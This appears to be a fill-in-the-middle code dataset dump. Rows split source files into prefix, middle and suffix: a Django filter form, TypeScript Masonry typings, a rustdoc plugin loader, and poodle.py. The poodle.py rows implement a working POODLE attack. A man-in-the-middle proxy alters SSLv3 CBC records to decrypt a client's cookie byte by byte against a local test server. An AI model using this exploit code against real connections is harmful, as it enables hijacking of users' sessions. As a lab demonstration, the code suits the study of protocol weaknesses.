file_name
large_stringlengths 4
140
| prefix
large_stringlengths 0
12.1k
| suffix
large_stringlengths 0
12k
| middle
large_stringlengths 0
7.51k
| fim_type
large_stringclasses 4
values |
---|---|---|---|---|
DependenciaFuncionalFormFilters.py | # -*- coding: UTF-8 -*-
from django import forms
from apps.registro.models import DependenciaFuncional, Jurisdiccion, TipoGestion, TipoDependenciaFuncional, TipoEducacion
class DependenciaFuncionalFormFilters(forms.Form):
| if filter_by('tipo_dependencia_funcional'):
q = q.filter(tipo_dependencia_funcional=self.cleaned_data['tipo_dependencia_funcional'])
return q
| jurisdiccion = forms.ModelChoiceField(queryset=Jurisdiccion.objects.order_by('nombre'), label='Jurisdicción', required=False)
tipo_dependencia_funcional = forms.ModelChoiceField(queryset=TipoDependenciaFuncional.objects.order_by('nombre'), label='Tipo de dependencia', required=False)
tipo_gestion = forms.ModelChoiceField(queryset=TipoGestion.objects.order_by('nombre'), label='Tipo de gestión', required=False)
nombre = forms.CharField(max_length=50, label='Nombre', required=False)
def buildQuery(self, q=None):
"""
Crea o refina un query de búsqueda.
"""
if q is None:
q = DependenciaFuncional.objects.all()
if self.is_valid():
def filter_by(field):
return self.cleaned_data.has_key(field) and self.cleaned_data[field] != '' and self.cleaned_data[field] is not None
if filter_by('nombre'):
q = q.filter(nombre__icontains=self.cleaned_data['nombre'])
if filter_by('jurisdiccion'):
q = q.filter(jurisdiccion=self.cleaned_data['jurisdiccion'])
if filter_by('tipo_gestion'):
q = q.filter(tipo_gestion=self.cleaned_data['tipo_gestion']) | identifier_body |
DependenciaFuncionalFormFilters.py | # -*- coding: UTF-8 -*-
from django import forms
from apps.registro.models import DependenciaFuncional, Jurisdiccion, TipoGestion, TipoDependenciaFuncional, TipoEducacion
class DependenciaFuncionalFormFilters(forms.Form):
jurisdiccion = forms.ModelChoiceField(queryset=Jurisdiccion.objects.order_by('nombre'), label='Jurisdicción', required=False)
tipo_dependencia_funcional = forms.ModelChoiceField(queryset=TipoDependenciaFuncional.objects.order_by('nombre'), label='Tipo de dependencia', required=False)
tipo_gestion = forms.ModelChoiceField(queryset=TipoGestion.objects.order_by('nombre'), label='Tipo de gestión', required=False)
nombre = forms.CharField(max_length=50, label='Nombre', required=False)
def bu | elf, q=None):
"""
Crea o refina un query de búsqueda.
"""
if q is None:
q = DependenciaFuncional.objects.all()
if self.is_valid():
def filter_by(field):
return self.cleaned_data.has_key(field) and self.cleaned_data[field] != '' and self.cleaned_data[field] is not None
if filter_by('nombre'):
q = q.filter(nombre__icontains=self.cleaned_data['nombre'])
if filter_by('jurisdiccion'):
q = q.filter(jurisdiccion=self.cleaned_data['jurisdiccion'])
if filter_by('tipo_gestion'):
q = q.filter(tipo_gestion=self.cleaned_data['tipo_gestion'])
if filter_by('tipo_dependencia_funcional'):
q = q.filter(tipo_dependencia_funcional=self.cleaned_data['tipo_dependencia_funcional'])
return q
| ildQuery(s | identifier_name |
DependenciaFuncionalFormFilters.py | # -*- coding: UTF-8 -*-
from django import forms
from apps.registro.models import DependenciaFuncional, Jurisdiccion, TipoGestion, TipoDependenciaFuncional, TipoEducacion
class DependenciaFuncionalFormFilters(forms.Form):
jurisdiccion = forms.ModelChoiceField(queryset=Jurisdiccion.objects.order_by('nombre'), label='Jurisdicción', required=False)
tipo_dependencia_funcional = forms.ModelChoiceField(queryset=TipoDependenciaFuncional.objects.order_by('nombre'), label='Tipo de dependencia', required=False) | def buildQuery(self, q=None):
"""
Crea o refina un query de búsqueda.
"""
if q is None:
q = DependenciaFuncional.objects.all()
if self.is_valid():
def filter_by(field):
return self.cleaned_data.has_key(field) and self.cleaned_data[field] != '' and self.cleaned_data[field] is not None
if filter_by('nombre'):
q = q.filter(nombre__icontains=self.cleaned_data['nombre'])
if filter_by('jurisdiccion'):
q = q.filter(jurisdiccion=self.cleaned_data['jurisdiccion'])
if filter_by('tipo_gestion'):
q = q.filter(tipo_gestion=self.cleaned_data['tipo_gestion'])
if filter_by('tipo_dependencia_funcional'):
q = q.filter(tipo_dependencia_funcional=self.cleaned_data['tipo_dependencia_funcional'])
return q | tipo_gestion = forms.ModelChoiceField(queryset=TipoGestion.objects.order_by('nombre'), label='Tipo de gestión', required=False)
nombre = forms.CharField(max_length=50, label='Nombre', required=False)
| random_line_split |
DependenciaFuncionalFormFilters.py | # -*- coding: UTF-8 -*-
from django import forms
from apps.registro.models import DependenciaFuncional, Jurisdiccion, TipoGestion, TipoDependenciaFuncional, TipoEducacion
class DependenciaFuncionalFormFilters(forms.Form):
jurisdiccion = forms.ModelChoiceField(queryset=Jurisdiccion.objects.order_by('nombre'), label='Jurisdicción', required=False)
tipo_dependencia_funcional = forms.ModelChoiceField(queryset=TipoDependenciaFuncional.objects.order_by('nombre'), label='Tipo de dependencia', required=False)
tipo_gestion = forms.ModelChoiceField(queryset=TipoGestion.objects.order_by('nombre'), label='Tipo de gestión', required=False)
nombre = forms.CharField(max_length=50, label='Nombre', required=False)
def buildQuery(self, q=None):
"""
Crea o refina un query de búsqueda.
"""
if q is None:
q = DependenciaFuncional.objects.all()
if self.is_valid():
def filter_by(field):
return self.cleaned_data.has_key(field) and self.cleaned_data[field] != '' and self.cleaned_data[field] is not None
if filter_by('nombre'):
q = q.filter(nombre__icontains=self.cleaned_data['nombre'])
if filter_by('jurisdiccion'):
q = q.filter(jurisdiccion=self.cleaned_data['jurisdiccion'])
if filter_by('tipo_gestion'):
q = | if filter_by('tipo_dependencia_funcional'):
q = q.filter(tipo_dependencia_funcional=self.cleaned_data['tipo_dependencia_funcional'])
return q
| q.filter(tipo_gestion=self.cleaned_data['tipo_gestion'])
| conditional_block |
Masonry.d.ts | import { PureComponent, Validator, Requireable } from 'react';
import { CellMeasurerCacheInterface, KeyMapper, MeasuredCellParent } from './CellMeasurer';
import { GridCellRenderer } from './Grid';
import { IndexRange } from '../../index';
/**
* Specifies the number of miliseconds during which to disable pointer events while a scroll is in progress.
* This improves performance and makes scrolling smoother.
*/ | export type OnCellsRenderedCallback = (params: IndexRange) => void;
export type OnScrollCallback = (params: { clientHeight: number; scrollHeight: number; scrollTop: number }) => void;
export type MasonryCellProps = {
index: number;
isScrolling: boolean;
key: React.Key;
parent: MeasuredCellParent;
style?: React.CSSProperties;
};
export type CellRenderer = (props: MasonryCellProps) => React.ReactNode;
export type MasonryProps = {
autoHeight: boolean;
cellCount: number;
cellMeasurerCache: CellMeasurerCacheInterface;
cellPositioner: Positioner;
cellRenderer: CellRenderer;
className?: string;
height: number;
id?: string;
keyMapper?: KeyMapper;
onCellsRendered?: OnCellsRenderedCallback;
onScroll?: OnScrollCallback;
overscanByPixels?: number;
role?: string;
scrollingResetTimeInterval?: number;
style?: React.CSSProperties;
tabIndex?: number | null;
width: number;
/**
* PLEASE NOTE
* The [key: string]: any; line is here on purpose
* This is due to the need of force re-render of PureComponent
* Check the following link if you want to know more
* https://github.com/bvaughn/react-virtualized#pass-thru-props
*/
[key: string]: any;
};
export type MasonryState = {
isScrolling: boolean;
scrollTop: number;
};
/**
* This component efficiently displays arbitrarily positioned cells using windowing techniques.
* Cell position is determined by an injected `cellPositioner` property.
* Windowing is vertical; this component does not support horizontal scrolling.
*
* Rendering occurs in two phases:
* 1) First pass uses estimated cell sizes (provided by the cache) to determine how many cells to measure in a batch.
* Batch size is chosen using a fast, naive layout algorithm that stacks images in order until the viewport has been filled.
* After measurement is complete (componentDidMount or componentDidUpdate) this component evaluates positioned cells
* in order to determine if another measurement pass is required (eg if actual cell sizes were less than estimated sizes).
* All measurements are permanently cached (keyed by `keyMapper`) for performance purposes.
* 2) Second pass uses the external `cellPositioner` to layout cells.
* At this time the positioner has access to cached size measurements for all cells.
* The positions it returns are cached by Masonry for fast access later.
* Phase one is repeated if the user scrolls beyond the current layout's bounds.
* If the layout is invalidated due to eg a resize, cached positions can be cleared using `recomputeCellPositions()`.
*
* Animation constraints:
* Simple animations are supported (eg translate/slide into place on initial reveal).
* More complex animations are not (eg flying from one position to another on resize).
*
* Layout constraints:
* This component supports multi-column layout.
* The height of each item may vary.
* The width of each item must not exceed the width of the column it is "in".
* The left position of all items within a column must align.
* (Items may not span multiple columns.)
*/
export class Masonry extends PureComponent<MasonryProps, MasonryState> {
static defaultProps: {
autoHeight: false;
keyMapper: identity;
onCellsRendered: noop;
onScroll: noop;
overscanByPixels: 20;
role: 'grid';
scrollingResetTimeInterval: typeof DEFAULT_SCROLLING_RESET_TIME_INTERVAL;
style: emptyObject;
tabIndex: 0;
};
clearCellPositions(): void;
// HACK This method signature was intended for Grid
invalidateCellSizeAfterRender(params: { rowIndex: number }): void;
recomputeCellPositions(): void;
static getDerivedStateFromProps(nextProps: MasonryProps, prevState: MasonryState): MasonryState | null;
}
export default Masonry;
export type emptyObject = {};
export type identity = <T>(value: T) => T;
export type noop = () => void;
export type Position = {
left: number;
top: number;
};
export type createCellPositionerParams = {
cellMeasurerCache: CellMeasurerCacheInterface;
columnCount: number;
columnWidth: number;
spacer?: number;
};
export type resetParams = {
columnCount: number;
columnWidth: number;
spacer?: number;
};
export type Positioner = ((index: number) => Position) & {
reset: (params: resetParams) => void;
};
export const createCellPositioner: (params: createCellPositionerParams) => Positioner; | export const DEFAULT_SCROLLING_RESET_TIME_INTERVAL = 150;
| random_line_split |
Masonry.d.ts | import { PureComponent, Validator, Requireable } from 'react';
import { CellMeasurerCacheInterface, KeyMapper, MeasuredCellParent } from './CellMeasurer';
import { GridCellRenderer } from './Grid';
import { IndexRange } from '../../index';
/**
* Specifies the number of miliseconds during which to disable pointer events while a scroll is in progress.
* This improves performance and makes scrolling smoother.
*/
export const DEFAULT_SCROLLING_RESET_TIME_INTERVAL = 150;
export type OnCellsRenderedCallback = (params: IndexRange) => void;
export type OnScrollCallback = (params: { clientHeight: number; scrollHeight: number; scrollTop: number }) => void;
export type MasonryCellProps = {
index: number;
isScrolling: boolean;
key: React.Key;
parent: MeasuredCellParent;
style?: React.CSSProperties;
};
export type CellRenderer = (props: MasonryCellProps) => React.ReactNode;
export type MasonryProps = {
autoHeight: boolean;
cellCount: number;
cellMeasurerCache: CellMeasurerCacheInterface;
cellPositioner: Positioner;
cellRenderer: CellRenderer;
className?: string;
height: number;
id?: string;
keyMapper?: KeyMapper;
onCellsRendered?: OnCellsRenderedCallback;
onScroll?: OnScrollCallback;
overscanByPixels?: number;
role?: string;
scrollingResetTimeInterval?: number;
style?: React.CSSProperties;
tabIndex?: number | null;
width: number;
/**
* PLEASE NOTE
* The [key: string]: any; line is here on purpose
* This is due to the need of force re-render of PureComponent
* Check the following link if you want to know more
* https://github.com/bvaughn/react-virtualized#pass-thru-props
*/
[key: string]: any;
};
export type MasonryState = {
isScrolling: boolean;
scrollTop: number;
};
/**
* This component efficiently displays arbitrarily positioned cells using windowing techniques.
* Cell position is determined by an injected `cellPositioner` property.
* Windowing is vertical; this component does not support horizontal scrolling.
*
* Rendering occurs in two phases:
* 1) First pass uses estimated cell sizes (provided by the cache) to determine how many cells to measure in a batch.
* Batch size is chosen using a fast, naive layout algorithm that stacks images in order until the viewport has been filled.
* After measurement is complete (componentDidMount or componentDidUpdate) this component evaluates positioned cells
* in order to determine if another measurement pass is required (eg if actual cell sizes were less than estimated sizes).
* All measurements are permanently cached (keyed by `keyMapper`) for performance purposes.
* 2) Second pass uses the external `cellPositioner` to layout cells.
* At this time the positioner has access to cached size measurements for all cells.
* The positions it returns are cached by Masonry for fast access later.
* Phase one is repeated if the user scrolls beyond the current layout's bounds.
* If the layout is invalidated due to eg a resize, cached positions can be cleared using `recomputeCellPositions()`.
*
* Animation constraints:
* Simple animations are supported (eg translate/slide into place on initial reveal).
* More complex animations are not (eg flying from one position to another on resize).
*
* Layout constraints:
* This component supports multi-column layout.
* The height of each item may vary.
* The width of each item must not exceed the width of the column it is "in".
* The left position of all items within a column must align.
* (Items may not span multiple columns.)
*/
export class | extends PureComponent<MasonryProps, MasonryState> {
static defaultProps: {
autoHeight: false;
keyMapper: identity;
onCellsRendered: noop;
onScroll: noop;
overscanByPixels: 20;
role: 'grid';
scrollingResetTimeInterval: typeof DEFAULT_SCROLLING_RESET_TIME_INTERVAL;
style: emptyObject;
tabIndex: 0;
};
clearCellPositions(): void;
// HACK This method signature was intended for Grid
invalidateCellSizeAfterRender(params: { rowIndex: number }): void;
recomputeCellPositions(): void;
static getDerivedStateFromProps(nextProps: MasonryProps, prevState: MasonryState): MasonryState | null;
}
export default Masonry;
export type emptyObject = {};
export type identity = <T>(value: T) => T;
export type noop = () => void;
export type Position = {
left: number;
top: number;
};
export type createCellPositionerParams = {
cellMeasurerCache: CellMeasurerCacheInterface;
columnCount: number;
columnWidth: number;
spacer?: number;
};
export type resetParams = {
columnCount: number;
columnWidth: number;
spacer?: number;
};
export type Positioner = ((index: number) => Position) & {
reset: (params: resetParams) => void;
};
export const createCellPositioner: (params: createCellPositionerParams) => Positioner;
| Masonry | identifier_name |
plugins.rs | // Copyright 2012-2013 The Rust Project Developers. See the COPYRIGHT
// file at the top-level directory of this distribution and at
// http://rust-lang.org/COPYRIGHT.
//
// Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
// http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
// <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
// option. This file may not be copied, modified, or distributed
// except according to those terms.
#![allow(deprecated)] // old path, used for compatibility with dynamic lib
use clean;
use std::dynamic_lib as dl;
use serialize::json;
use std::mem;
use std::string::String;
use std::path::PathBuf;
pub type PluginJson = Option<(String, json::Json)>;
pub type PluginResult = (clean::Crate, PluginJson);
pub type PluginCallback = fn (clean::Crate) -> PluginResult;
/// Manages loading and running of plugins
pub struct PluginManager {
dylibs: Vec<dl::DynamicLibrary> ,
callbacks: Vec<PluginCallback> ,
/// The directory plugins will be loaded from
pub prefix: PathBuf,
}
impl PluginManager {
/// Create a new plugin manager
pub fn new(prefix: PathBuf) -> PluginManager {
PluginManager {
dylibs: Vec::new(),
callbacks: Vec::new(),
prefix: prefix,
}
}
/// Load a plugin with the given name.
///
/// Turns `name` into the proper dynamic library filename for the given
/// platform. On windows, it turns into name.dll, on OS X, name.dylib, and
/// elsewhere, libname.so.
pub fn load_plugin(&mut self, name: String) {
let x = self.prefix.join(libname(name));
let lib_result = dl::DynamicLibrary::open(Some(&x));
let lib = lib_result.unwrap();
unsafe {
let plugin = lib.symbol("rustdoc_plugin_entrypoint").unwrap();
self.callbacks.push(mem::transmute::<*mut u8,PluginCallback>(plugin));
}
self.dylibs.push(lib);
}
/// Load a normal Rust function as a plugin.
///
/// This is to run passes over the cleaned crate. Plugins run this way
/// correspond to the A-aux tag on Github.
pub fn add_plugin(&mut self, plugin: PluginCallback) {
self.callbacks.push(plugin);
}
/// Run all the loaded plugins over the crate, returning their results
pub fn run_plugins(&self, krate: clean::Crate) -> (clean::Crate, Vec<PluginJson> ) {
let mut out_json = Vec::new();
let mut krate = krate;
for &callback in &self.callbacks {
let (c, res) = callback(krate);
krate = c;
out_json.push(res);
}
(krate, out_json)
}
}
| n.push_str(".dll");
n
}
#[cfg(target_os="macos")]
fn libname(mut n: String) -> String {
n.push_str(".dylib");
n
}
#[cfg(all(not(target_os="windows"), not(target_os="macos")))]
fn libname(n: String) -> String {
let mut i = String::from_str("lib");
i.push_str(&n);
i.push_str(".so");
i
} | #[cfg(target_os = "windows")]
fn libname(mut n: String) -> String { | random_line_split |
plugins.rs | // Copyright 2012-2013 The Rust Project Developers. See the COPYRIGHT
// file at the top-level directory of this distribution and at
// http://rust-lang.org/COPYRIGHT.
//
// Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
// http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
// <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
// option. This file may not be copied, modified, or distributed
// except according to those terms.
#![allow(deprecated)] // old path, used for compatibility with dynamic lib
use clean;
use std::dynamic_lib as dl;
use serialize::json;
use std::mem;
use std::string::String;
use std::path::PathBuf;
pub type PluginJson = Option<(String, json::Json)>;
pub type PluginResult = (clean::Crate, PluginJson);
pub type PluginCallback = fn (clean::Crate) -> PluginResult;
/// Manages loading and running of plugins
pub struct PluginManager {
dylibs: Vec<dl::DynamicLibrary> ,
callbacks: Vec<PluginCallback> ,
/// The directory plugins will be loaded from
pub prefix: PathBuf,
}
impl PluginManager {
/// Create a new plugin manager
pub fn new(prefix: PathBuf) -> PluginManager |
/// Load a plugin with the given name.
///
/// Turns `name` into the proper dynamic library filename for the given
/// platform. On windows, it turns into name.dll, on OS X, name.dylib, and
/// elsewhere, libname.so.
pub fn load_plugin(&mut self, name: String) {
let x = self.prefix.join(libname(name));
let lib_result = dl::DynamicLibrary::open(Some(&x));
let lib = lib_result.unwrap();
unsafe {
let plugin = lib.symbol("rustdoc_plugin_entrypoint").unwrap();
self.callbacks.push(mem::transmute::<*mut u8,PluginCallback>(plugin));
}
self.dylibs.push(lib);
}
/// Load a normal Rust function as a plugin.
///
/// This is to run passes over the cleaned crate. Plugins run this way
/// correspond to the A-aux tag on Github.
pub fn add_plugin(&mut self, plugin: PluginCallback) {
self.callbacks.push(plugin);
}
/// Run all the loaded plugins over the crate, returning their results
pub fn run_plugins(&self, krate: clean::Crate) -> (clean::Crate, Vec<PluginJson> ) {
let mut out_json = Vec::new();
let mut krate = krate;
for &callback in &self.callbacks {
let (c, res) = callback(krate);
krate = c;
out_json.push(res);
}
(krate, out_json)
}
}
#[cfg(target_os = "windows")]
fn libname(mut n: String) -> String {
n.push_str(".dll");
n
}
#[cfg(target_os="macos")]
fn libname(mut n: String) -> String {
n.push_str(".dylib");
n
}
#[cfg(all(not(target_os="windows"), not(target_os="macos")))]
fn libname(n: String) -> String {
let mut i = String::from_str("lib");
i.push_str(&n);
i.push_str(".so");
i
}
| {
PluginManager {
dylibs: Vec::new(),
callbacks: Vec::new(),
prefix: prefix,
}
} | identifier_body |
plugins.rs | // Copyright 2012-2013 The Rust Project Developers. See the COPYRIGHT
// file at the top-level directory of this distribution and at
// http://rust-lang.org/COPYRIGHT.
//
// Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
// http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
// <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
// option. This file may not be copied, modified, or distributed
// except according to those terms.
#![allow(deprecated)] // old path, used for compatibility with dynamic lib
use clean;
use std::dynamic_lib as dl;
use serialize::json;
use std::mem;
use std::string::String;
use std::path::PathBuf;
pub type PluginJson = Option<(String, json::Json)>;
pub type PluginResult = (clean::Crate, PluginJson);
pub type PluginCallback = fn (clean::Crate) -> PluginResult;
/// Manages loading and running of plugins
pub struct PluginManager {
dylibs: Vec<dl::DynamicLibrary> ,
callbacks: Vec<PluginCallback> ,
/// The directory plugins will be loaded from
pub prefix: PathBuf,
}
impl PluginManager {
/// Create a new plugin manager
pub fn | (prefix: PathBuf) -> PluginManager {
PluginManager {
dylibs: Vec::new(),
callbacks: Vec::new(),
prefix: prefix,
}
}
/// Load a plugin with the given name.
///
/// Turns `name` into the proper dynamic library filename for the given
/// platform. On windows, it turns into name.dll, on OS X, name.dylib, and
/// elsewhere, libname.so.
pub fn load_plugin(&mut self, name: String) {
let x = self.prefix.join(libname(name));
let lib_result = dl::DynamicLibrary::open(Some(&x));
let lib = lib_result.unwrap();
unsafe {
let plugin = lib.symbol("rustdoc_plugin_entrypoint").unwrap();
self.callbacks.push(mem::transmute::<*mut u8,PluginCallback>(plugin));
}
self.dylibs.push(lib);
}
/// Load a normal Rust function as a plugin.
///
/// This is to run passes over the cleaned crate. Plugins run this way
/// correspond to the A-aux tag on Github.
pub fn add_plugin(&mut self, plugin: PluginCallback) {
self.callbacks.push(plugin);
}
/// Run all the loaded plugins over the crate, returning their results
pub fn run_plugins(&self, krate: clean::Crate) -> (clean::Crate, Vec<PluginJson> ) {
let mut out_json = Vec::new();
let mut krate = krate;
for &callback in &self.callbacks {
let (c, res) = callback(krate);
krate = c;
out_json.push(res);
}
(krate, out_json)
}
}
#[cfg(target_os = "windows")]
fn libname(mut n: String) -> String {
n.push_str(".dll");
n
}
#[cfg(target_os="macos")]
fn libname(mut n: String) -> String {
n.push_str(".dylib");
n
}
#[cfg(all(not(target_os="windows"), not(target_os="macos")))]
fn libname(n: String) -> String {
let mut i = String::from_str("lib");
i.push_str(&n);
i.push_str(".so");
i
}
| new | identifier_name |
poodle.py | self.request.send(b'OK')
except ssl.SSLError as e:
pass
return
class Server:
"""The secure server.
A sample server, serving on his host and port waiting the client
"""
def __init__(self, host, port):
self.host = host
self.port = port
def connection(self):
SocketServer.TCPServer.allow_reuse_address = True
self.httpd = SocketServer.TCPServer((self.host, self.port), SecureTCPHandler)
server = threading.Thread(target=self.httpd.serve_forever)
server.daemon=True
server.start()
print('Server is serving HTTPS on {!r} port {}'.format(self.host, self.port))
return
def get_host(self):
return self.host
def get_port(self):
return self.port
def disconnect(self):
print('Server stop serving HTTPS on {!r} port {}'.format(self.host, self.port))
self.httpd.shutdown()
return
class Client:
""" The unsecure post of the client can be a "unsecure" browser for example.
The client generate a random cookie and send it to the server through the proxy
The attacker by injecting javascript code can control the sending request of the client to the proxy -> server
"""
def __init__(self, host, port):
self.proxy_host = host
self.proxy_port = port
self.cookie = ''.join(random.SystemRandom().choice(string.uppercase + string.digits + string.lowercase) for _ in xrange(15))
print draw("Sending request : ", bold=True, fg_yellow=True)
print draw("GET / HTTP/1.1\r\nCookie: " + self.cookie + "\r\n\r\n", bold=True, fg_yellow=True)
def connection(self):
# Initialization of the client
ssl_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ssl_sock = ssl.wrap_socket(ssl_sock, server_side=False, ssl_version=ssl.PROTOCOL_SSLv3)
ssl_sock.connect((self.proxy_host,self.proxy_port))
ssl_sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
self.socket = ssl_sock
return
def request(self, path=0, data=0):
srt_path = ''
srt_data = ''
for x in range(0,path):
srt_path += 'A'
for x in range(0,data):
srt_data += 'D'
try:
self.socket.sendall(b"GET /"+ srt_path +" HTTP/1.1\r\nCookie: " + self.cookie + "\r\n\r\n" + srt_data)
msg = "".join([str(i) for i in self.socket.recv(1024).split(b"\r\n")])
except ssl.SSLError as e:
pass
pass
return
def disconnect(self):
self.socket.close()
return
class ProxyTCPHandler(SocketServer.BaseRequestHandler):
"""
Start a connection to the secure server and handle multiple socket connections between the client and the server
Informe the attacker about the client's frames or the server's response
Finally redirect the data from the client to the server and inversely
"""
def handle(self):
# Connection to the secure server
socket_server = socket.create_connection((server.get_host(), server.get_port()))
# input allow us to monitor the socket of the client and the server
inputs = [socket_server, self.request]
running = True
data_altered = False
length_header = 24
while running:
readable = select.select(inputs, [], [])[0]
for source in readable:
if source is socket_server:
data = socket_server.recv(1024)
if len(data) == 0:
running = False
break
if data_altered is True:
(content_type, version, length) = struct.unpack('>BHH', data[0:5])
if content_type == 23:
poodle.set_decipherable(True)
data_altered = False
# we send data to the client
self.request.send(data)
elif source is self.request:
ssl_header = self.request.recv(5)
if ssl_header == '':
running = False
break
(content_type, version, length) = struct.unpack('>BHH', ssl_header)
data = self.request.recv(length)
if len(data) == 0:
running = False
if length == 32:
length_header = 32
if content_type == 23 and length > length_header:
poodle.set_length_frame(data)
data = poodle.alter()
data_altered = True
# we send data to the server
socket_server.send(ssl_header+data)
return
class Proxy:
""" Assimilate to a MitmProxy
start a serving on his host and port and redirect the data to the server due to this handler
"""
def __init__(self, host, port):
self.host = host
self.port = port
def connection(self):
SocketServer.TCPServer.allow_reuse_address = True
httpd = SocketServer.TCPServer((self.host, self.port), ProxyTCPHandler)
proxy = threading.Thread(target=httpd.serve_forever)
proxy.daemon=True
proxy.start()
print('Proxy is launched on {!r} port {}'.format(self.host, self.port))
self.proxy = httpd
return
def disconnect(self):
print('Proxy is stopped on {!r} port {}'.format(self.host, self.port))
self.proxy.shutdown()
return
class Poodle(Client):
""" Assimilate to the attacker
detect the length of a CBC block
alter the ethernet frame of the client to decipher a byte regarding the proxy informations
"""
def __init__(self, client):
self.client = client
self.length_block = 0
self.start_exploit = False
self.decipherable = False
self.request = ''
self.byte_decipher = 0
def run(self):
self.client_connection()
self.size_of_block()
self.start_exploit = True
# disconnect the client to avoid "connection reset by peer"
self.client_disconect()
print "Start decrypting the request..."
self.exploit()
print '\n'
print draw("%r" %(self.request), bold=True, fg_yellow=True)
print '\n'
self.client_disconect()
return
def exploit(self):
# start at block 1, finish at block n-2
# 0 => IV unknow, n => padding block, n-1 => MAC block
length_f = self.length_frame
for i in range(1,(length_f/self.length_block) - 1):
self.current_block = i
for j in range(self.length_block-1, -1, -1):
|
return
def choosing_block(self, current_block):
return self.frame[current_block * self.length_block:(current_block + 1) * self.length_block]
def find_plaintext_byte(self, frame, byte):
nb_request = 0
plain = ""
print ''
while True:
self.client_connection()
prefix_length = byte
suffix_length = self.length_block - byte
self.send_request_from_the_client(self.length_block+self.nb_prefix+prefix_length, suffix_length)
# sleep to avoid "connection reset by peer" on macintosh
time.sleep(0.0001)
self.client_disconect()
if self.decipherable is True:
self.byte_decipher += 1
plain = self.decipher(self.frame)
self.decipherable = False
break
nb_request += 1
sys.stdout.write("\rclient's request %4s" % (nb_request))
sys.stdout.flush()
return (chr(plain), nb_request)
def size_of_block(self):
print "Begins searching the size of a block...\n"
self.send_request_from_the_client()
reference_length = self.length_frame
i = 0
while True:
self.send_request_from_the_client(i)
current_length = self.length_frame
self.length_block = current_length - reference_length
if self.length_block != 0:
self.nb_prefix = i
print draw("CBC block size " + str(self.length_block) + "\n", bold=True)
break
i += 1
self.decipherable = False
def decipher(self, data):
return self.choosing_block(self.current_block-1)[-1] ^ self.choosing_block(-2)[-1] ^ (self.length_block-1)
def alter(self):
if self.start_exploit is True:
self.frame = bytearray(self.frame)
self.frame = self.frame[:-self.length_block] + self.choosing_block(self.current_block)
return str | (plain, nb_request) = self.find_plaintext_byte(self.frame,j)
self.request += plain
percent = 100.0 * self.byte_decipher / (length_f - 2 * self.length_block)
sys.stdout.write("\rProgression %2.0f%% - client's request %4s - byte found: %r" % (percent, nb_request, plain))
sys.stdout.flush() | conditional_block |
poodle.py | , port):
self.host = host
self.port = port
def connection(self):
SocketServer.TCPServer.allow_reuse_address = True
self.httpd = SocketServer.TCPServer((self.host, self.port), SecureTCPHandler)
server = threading.Thread(target=self.httpd.serve_forever)
server.daemon=True
server.start()
print('Server is serving HTTPS on {!r} port {}'.format(self.host, self.port))
return
def get_host(self):
return self.host
def get_port(self):
return self.port
def disconnect(self):
print('Server stop serving HTTPS on {!r} port {}'.format(self.host, self.port))
self.httpd.shutdown()
return
class Client:
""" The unsecure post of the client can be a "unsecure" browser for example.
The client generate a random cookie and send it to the server through the proxy
The attacker by injecting javascript code can control the sending request of the client to the proxy -> server
"""
def __init__(self, host, port):
self.proxy_host = host
self.proxy_port = port
self.cookie = ''.join(random.SystemRandom().choice(string.uppercase + string.digits + string.lowercase) for _ in xrange(15))
print draw("Sending request : ", bold=True, fg_yellow=True)
print draw("GET / HTTP/1.1\r\nCookie: " + self.cookie + "\r\n\r\n", bold=True, fg_yellow=True)
def connection(self):
# Initialization of the client
ssl_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ssl_sock = ssl.wrap_socket(ssl_sock, server_side=False, ssl_version=ssl.PROTOCOL_SSLv3)
ssl_sock.connect((self.proxy_host,self.proxy_port))
ssl_sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
self.socket = ssl_sock
return
def request(self, path=0, data=0):
srt_path = ''
srt_data = ''
for x in range(0,path):
srt_path += 'A'
for x in range(0,data):
srt_data += 'D'
try:
self.socket.sendall(b"GET /"+ srt_path +" HTTP/1.1\r\nCookie: " + self.cookie + "\r\n\r\n" + srt_data)
msg = "".join([str(i) for i in self.socket.recv(1024).split(b"\r\n")])
except ssl.SSLError as e:
pass
pass
return
def disconnect(self):
self.socket.close()
return
class ProxyTCPHandler(SocketServer.BaseRequestHandler):
"""
Start a connection to the secure server and handle multiple socket connections between the client and the server
Informe the attacker about the client's frames or the server's response
Finally redirect the data from the client to the server and inversely
"""
def handle(self):
# Connection to the secure server
socket_server = socket.create_connection((server.get_host(), server.get_port()))
# input allow us to monitor the socket of the client and the server
inputs = [socket_server, self.request]
running = True
data_altered = False
length_header = 24
while running:
readable = select.select(inputs, [], [])[0]
for source in readable:
if source is socket_server:
data = socket_server.recv(1024)
if len(data) == 0:
running = False
break
if data_altered is True:
(content_type, version, length) = struct.unpack('>BHH', data[0:5])
if content_type == 23:
poodle.set_decipherable(True)
data_altered = False
# we send data to the client
self.request.send(data)
elif source is self.request:
ssl_header = self.request.recv(5)
if ssl_header == '':
running = False
break
(content_type, version, length) = struct.unpack('>BHH', ssl_header)
data = self.request.recv(length)
if len(data) == 0:
running = False
if length == 32:
length_header = 32
if content_type == 23 and length > length_header:
poodle.set_length_frame(data)
data = poodle.alter()
data_altered = True
# we send data to the server
socket_server.send(ssl_header+data)
return
class Proxy:
""" Assimilate to a MitmProxy
start a serving on his host and port and redirect the data to the server due to this handler
"""
def __init__(self, host, port):
self.host = host
self.port = port
def connection(self):
SocketServer.TCPServer.allow_reuse_address = True
httpd = SocketServer.TCPServer((self.host, self.port), ProxyTCPHandler)
proxy = threading.Thread(target=httpd.serve_forever)
proxy.daemon=True
proxy.start()
print('Proxy is launched on {!r} port {}'.format(self.host, self.port))
self.proxy = httpd
return
def disconnect(self):
print('Proxy is stopped on {!r} port {}'.format(self.host, self.port))
self.proxy.shutdown()
return
class Poodle(Client):
""" Assimilate to the attacker
detect the length of a CBC block
alter the ethernet frame of the client to decipher a byte regarding the proxy informations
"""
def __init__(self, client):
self.client = client
self.length_block = 0
